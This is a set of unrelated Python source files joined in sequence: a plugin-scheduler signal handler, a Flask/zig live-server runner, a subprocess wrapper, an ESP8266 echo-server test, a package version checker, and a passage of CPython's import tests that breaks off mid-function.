def _install_signal_handlers(self):
"""
Installs signal handlers for SIGTERM, SIGINT and SIGHUP
Returns:
None
"""
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, signal_number, _):
"""
The signal handler addresses two scenarios:
* The Plugin Scheduler thread is alive: sets an event to shutdown the thread
* The Plugin Scheduler thread is not alive: this can happen if we have not been able to acquire the lock or
if the Plugin Scheduler thread quits unexpectedly. In this case, this handler proceeds to call the function
to shutdown other services (e.g. Celery Beat Service)
In case a lock has not yet been acquired, then it also cancels the pending lock acquisition request
In case it receives a SIGHUP, it calls startup_plugin_scheduler. This would re-create the PanoptesContext -
essentially, re-reading the configuration
Args:
signal_number (int): The received signal number
_ (frame): Current stack frame object
Returns:
None
"""
# If the Plugin Scheduler is already in the process of shutdown, then do nothing - prevents issues
# with re-entrancy
if self._shutdown_plugin_scheduler.is_set():
print('%s Plugin Scheduler already in the process of shutdown, ignoring %s' %
(self._plugin_type_display_name, const.SIGNALS_TO_NAMES_DICT[signal_number]))
return
print('Caught %s, shutting down %s Plugin Scheduler' % (
const.SIGNALS_TO_NAMES_DICT[signal_number], self._plugin_type_display_name))
shutdown_interval = int(int(self._config[self._plugin_type]['plugin_scan_interval']) * 2)
print('Shutdown/restart may take up to %s seconds' % shutdown_interval)
print('Signalling for %s Plugin Scheduler Task Thread to shutdown' % self._plugin_type_display_name)
self._shutdown_plugin_scheduler.set()
if (self._t is not None) and (self._t.is_alive()):
self._t.join()
if (self._t is None) or (not self._t.is_alive()):
print('%s Plugin Scheduler Task Thread is not active - shutting down other services' %
self._plugin_type_display_name)
if self._plugin_scheduler_celery_beat_service:
print('Shutting down Celery Beat Service')
self._plugin_scheduler_celery_beat_service.stop()
if self._lock:
print('Releasing lock')
self._lock.release()
print('%s Plugin Scheduler shutdown complete' % self._plugin_type_display_name)
sys.exit()
|
runner.py
|
import threading
import multiprocessing
import uuid
import logging
import requests
import flask
import time
from typing import Callable
from zig import Zig
logger = logging.getLogger(__name__)
class ServerThread:
# common interface that can be used by Thread or Process
# without coupling Thread/Process library to code
def __init__(self):
pass
def start(self):
raise NotImplementedError
def run(self):
super().run()
def close(self):
raise NotImplementedError
def is_alive(self):
raise NotImplementedError
def join(self):
raise NotImplementedError
class ServerOperations:
# Operation object that can be instantiated and run by a thread/process
# NOTE: QUESTIONS
# Should this be inherited or use as an object(bridge)?
# Inherit: share the same state, don't need to pass variables around
# Inherit: can change inheritance in the future too
# Object: decouple, can swap in another implementation in the future
def __init__(self):
self.app = None
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
@staticmethod
def _stop_server():
#TODO: should be container agnostic
stopper = flask.request.environ.get("werkzeug.server.shutdown")
stopper()
return "Flask Server is shutting down"
def prepare_app(self, app):
container = self.app.container.app_instance
self.app.container.add_url_route(container,
self.stop_route,
self.stop_route,
self._stop_server
)
self.host = self.app.container_config.host
self.port = self.app.container_config.port
#TODO: need to add container-specific method to get index
if self.port:
self.index_url = "".join(["http://", self.host, ":", str(self.port)])
else:
self.index_url = "".join(["http://", self.host])
def run(self):
if not self.app: raise ValueError("Need to pass zig app to thread")
try:
self.prepare_app(self.app)
except:
raise Exception("Failure to prepare app")
# runs Flask/Django server
try:
self.app.run()
except:
# close thread if exception
raise
finally:
logger.info("Server thread is running")
#wait_for(requests.get(self.index_url), 1000)
def close(self):
#TODO container agnostic method
#TODO need to get host and port from app
stop_url = "".join([self.index_url, self.stop_route])
if self.is_alive():
try:
requests.get(stop_url)
except:
raise Exception("Cannot reach stop url, or server wasn't started")
class LiveServerThread(ServerThread, ServerOperations):
""" Uses Flask/Django Server to run tests
it should be agnostics
"""
def __init__(self):
# set app later
self.thread = threading.Thread(target=self.run)
ServerOperations.__init__(self)
def start(self):
self.thread.start()
def is_alive(self):
return self.thread.is_alive()
def join(self):
self.thread.join()
def close(self):
ServerOperations.close(self)
class LiveServerProcess(ServerThread, ServerOperations):
def __init__(self):
self.process = multiprocessing.Process(target=self.run)
def start(self):
self.process.start()
def close(self):
if self.is_alive():
try:
self.process.close()
except ValueError:
logging.debug("process wass still running. It will be forced killed")
self.process.kill()
def is_alive(self):
return self.process.is_alive()
def join(self):
self.process.join()
def run(self):
ServerOperations.run(self)
def wait_for(condition: Callable, time_out, expected_output=True, poll=0.1):
res = condition()
end_time = time.time() + time_out
while res != expected_output:
if time.time() > end_time:
raise Exception("timeout")
time.sleep(poll)
# try again
res=condition()
return res
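# Hedged usage sketch: poll a hypothetical health check until it returns True,
# giving up after 5 seconds and re-checking every 0.1 s (the default poll):
#
#   wait_for(lambda: requests.get(index_url).status_code == 200, time_out=5)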
"""
class ThreadController(object):
# Able to plug in any type of server
def __init__(self, app):
self.app = app
self.server_thread = None
def __call__(self, *args, **kwarg):
self.start_thread(*args, **kwarg)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
return
def start_thread(self, app: Zig, thread_class: ServerThread=None):
thread_class = thread_class if thread_class else LiveFlaskServerThread
self.server_thread = thread_class(app)
try:
self.server_thread.start()
except RuntimeError:
raise
self.started = self.server_thread.is_alive()
return self.server_thread
def thread(app):
self.server_thread = LiveFlaskServerThread(app)
try:
self.server_thread.start()
except RuntimeError:
raise
self.started = self.thread.is_alive()
"""
|
cmd_process.py
|
import fcntl
import inspect
import os
import re
import subprocess
from threading import Thread
from time import sleep
from waiting import wait, TimeoutExpired
class CmdProcess:
"""
Lightweight wrapper over subprocess.Popen.
Should be used where interaction with stdin and callbacks on
events are not required.
"""
def __init__(self, cmd, log_path):
self._cmd = cmd
self._log_path = log_path
self._log_file = None
self._proc = None
self._return_code = None
self._cb_on_finish = []
@property
def return_code(self):
if self._proc is None: # in case the process has not been started yet
return self._return_code
if self._return_code is None:
self._return_code = self._proc.poll()
return self._return_code
def add_callback_on_finish(self, cb):
self._cb_on_finish.append(cb)
def _run(self):
with open(self._log_path, 'ab', buffering=0) as log_file:
log_file.write(f'Run: {self._cmd}\n'.encode('utf-8'))
self._proc = subprocess.Popen(self._cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=log_file,
stderr=log_file)
while self.return_code is None:
sleep(1)
log_file.write(f'EXIT CODE: {self.return_code}\n'.encode('utf-8'))
for cb in self._cb_on_finish:
cb()
def run(self):
t = Thread(target=self._run, daemon=True)
t.start()
def kill(self):
self._proc.kill()
class CmdProcessInteractive:
def __init__(self, cmd, env_vars=None, logger=None, print_output=False):
self.cmd = cmd
custom_env_vars = os.environ.copy()
if env_vars:
custom_env_vars.update(env_vars)
self.env_vars = custom_env_vars
self.pid = None
self.proc = None
self.output = [] # list with lines from stdout
self.errors = [] # list with lines from stderr
self.stdout_offset = 0 # previous lines will be ignored in search
self._return_code = None
self._killed = False # whether running process was stopped by .kill()
self._logger = logger
self._print_output = print_output
# callbacks
self.on_events = {}
self.on_finish = []
@property
def return_code(self):
if self.proc is None: # in case the process has not been started yet
return self._return_code
if self._return_code is None:
self._return_code = self.proc.poll()
return self._return_code
def run(self):
if self._logger:
self._logger.debug('Run: %s' % self.cmd)
self.proc = subprocess.Popen(self.cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self.env_vars
)
self.pid = self.proc.pid
# Enable non-blocking read (Unix only!)
fcntl.fcntl(self.proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
fcntl.fcntl(self.proc.stderr.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
# Process output
out_iterator = _OutputIterator(self.proc.stdout)
err_iterator = _OutputIterator(self.proc.stderr)
self._process_output(out_iterator, err_iterator)
if self._logger:
self._logger.debug('EXIT CODE: %s' % self.return_code)
# Process callbacks on finish
for cb in self.on_finish:
cb()
def _process_output(self, out_iter, err_iter):
while not all([self.return_code is not None, out_iter.is_empty, err_iter.is_empty]):
# stop further processing if process has been terminated from code
if self._killed:
break
out_line, err_line = next(out_iter), next(err_iter)
if not out_line and not err_line:
sleep(0.01)
continue
if out_line:
self._process_line(out_line)
if err_line:
self._process_line(err_line, from_std_err=True)
else:
# do final check for missed output
try:
out_line = wait(lambda: next(out_iter), timeout_seconds=0.05)
self._process_line(out_line)
except TimeoutExpired:
out_line = None
try:
err_line = wait(lambda: next(err_iter), timeout_seconds=0.05)
self._process_line(err_line, from_std_err=True)
except TimeoutExpired:
err_line = None
# If unprocessed output was observed - run processing again
if out_line or err_line:
self._process_output(out_iter, err_iter)
def run_in_thread(self):
worker = Thread(target=self.run, daemon=True)
worker.start()
def send_to_stdin(self, input_):
"""
:param input_: string or bytes
"""
# Send input
self.update_stdout_offset()
if isinstance(input_, str):
input_ = bytes(input_, 'ascii')
input_ += b'\n'
self.proc.stdin.write(input_)
self.proc.stdin.flush()
# Log
msg = 'sent to stdin: %s' % str(input_)
if self._logger:
self._logger.info(msg)
if self._print_output:
print(msg)
def kill(self):
# if process is still running - send `SIGKILL` signal
if self._return_code is None:
if self._logger:
self._logger.info('KILLED (SIGKILL)')
self._killed = True
self.proc.kill()
def terminate(self):
# if process is still running - send `SIGTERM` signal
if self._return_code is None:
if self._logger:
self._logger.info('TERMINATED (SIGTERM)')
self.proc.terminate()
def update_stdout_offset(self, offset=None):
"""
Set offset to the given value or, by default, to the current output length
"""
if offset is not None:
self.stdout_offset = offset
else:
self.stdout_offset = len(self.output)
def wait_for_output(self, text, timeout_seconds=10, regex=False, **kwargs):
"""
:return: line with text or raises TimeoutExpired exception
"""
seen = self.stdout_offset
def finder():
nonlocal seen
for line in self.output[seen:]:
if regex:
match = re.search(text, line)
else:
match = text in line
if match:
return line
seen += 1
return ''
waiting_for = 'Text "%s" is present inside output of "%s" cmd' % (text, self.cmd)
return wait(
lambda: self.output and finder(), timeout_seconds, waiting_for=waiting_for, sleep_seconds=0.01, **kwargs
)
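# Hedged usage sketch (hypothetical command and log line, not from this module):
#
#   proc = CmdProcessInteractive('python -u server.py', print_output=True)
#   proc.run_in_thread()
#   line = proc.wait_for_output('Listening on', timeout_seconds=30)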
def register_callback_on_event(self, callback, log_event):
"""
Register function, which will be called on specified log event
"""
self.on_events[log_event] = callback
def register_callback_on_finish(self, callback):
self.on_finish.append(callback)
def _process_line(self, line, from_std_err=False):
if self._print_output:
print(line)
if self._logger:
if from_std_err:
self._logger.error(line)
else:
self._logger.debug(line)
if from_std_err:
self.errors.append(line)
else:
self.output.append(line)
# Process callbacks
for event, callback in self.on_events.items():
if event in line:
if inspect.getfullargspec(callback).args:
callback(line)
else:
callback()
class _OutputIterator:
"""
Simple iterator over non-blocking std object
"""
def __init__(self, std):
self._std = std
self.is_empty = False
def __iter__(self):
return self
def __next__(self):
line = self._std.readline()
line = line.decode('utf-8')
if line:
self.is_empty = False
else:
self.is_empty = True
return line.strip()
|
test_WiFiServer.py
|
from mock_decorators import setup, teardown
from threading import Thread
import socket
import time
stop_client_thread = False
client_thread = None
@setup('Simple echo server')
def setup_echo_server(e):
global stop_client_thread
global client_thread
def echo_client_thread():
server_address = socket.gethostbyname('esp8266-wfs-test.local')
count = 0
while count < 5 and not stop_client_thread:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server_address, 5000))
sock.settimeout(1.0)
buf = b'a' * 1023 + b'\n'
sock.sendall(buf)
data = b''
retries = 0
while len(data) < 1024 and retries < 3:
data += sock.recv(1024)
retries += 1
print('Received {} bytes'.format(len(data)))
if len(data) != 1024:
raise RuntimeError('client failed to receive response')
count += 1
stop_client_thread = False
client_thread = Thread(target=echo_client_thread)
client_thread.start()
@teardown('Simple echo server')
def teardown_echo_server(e):
global stop_client_thread
stop_client_thread = True
client_thread.join()
|
__version__.py
|
# pylint: disable=C0415,C0413
__version__ = '0.0.15'
def check_version():
def _check_version():
import re
from distutils.version import LooseVersion as V
import httpx
try:
resp = httpx.get(
'https://mirrors.aliyun.com/pypi/simple/botoy/', timeout=10
)
resp.raise_for_status()
except Exception:
pass
else:
versions = re.findall(r'botoy-(.*?)\.tar\.gz', resp.text)
if versions:
versions = set(versions)
local_v = V(__version__)
latest_version = max(V(v) for v in versions)
if local_v < latest_version:
info = f'\033[33m==== Current version: \033[31m{local_v}\033[33m, latest available version: \033[31m{latest_version}\033[33m, please update! ====\033[0m'
print(info)
from threading import Thread
t = Thread(target=_check_version)
t.daemon = True
t.start()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
